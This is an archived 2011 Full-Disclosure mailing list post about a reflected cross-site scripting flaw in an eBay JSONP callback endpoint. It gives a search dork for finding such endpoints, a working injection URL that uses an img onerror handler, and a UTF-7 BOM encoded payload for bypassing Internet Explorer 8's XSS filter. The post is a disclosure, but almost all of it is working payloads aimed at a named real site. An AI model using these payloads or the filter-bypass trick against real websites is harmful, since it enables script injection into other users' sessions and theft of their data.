|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: IEhrepus (5up3rh3i
gmail.com)
Date: Fri Feb 11 2011 - 07:17:57 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
"site:ebay.com inurl:callback" on google.com
and get this url:
http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?
then
http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?xxxx%3Cimg%20src=1%20onerror=alert(1)%3E
ofcourse u can use 《xss attacks through utf7-BOM string
injection<http://seclists.org/fulldisclosure/2011/Feb/199>》
to bypass ie8 xss filters
http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=%2B%2Fv811..%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg-xcsxxadas
--superhei from http://www.80vul.com
--ad--
About Ph4nt0m Webzine
Ph4nt0m Webzine is a free network Security Magazine,We accept articles in
English and Chinese, you are welcome contributions
.mailto:root_at_ph4nt0m.org <root_at_ph4nt0m.org> pls.thank you!
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]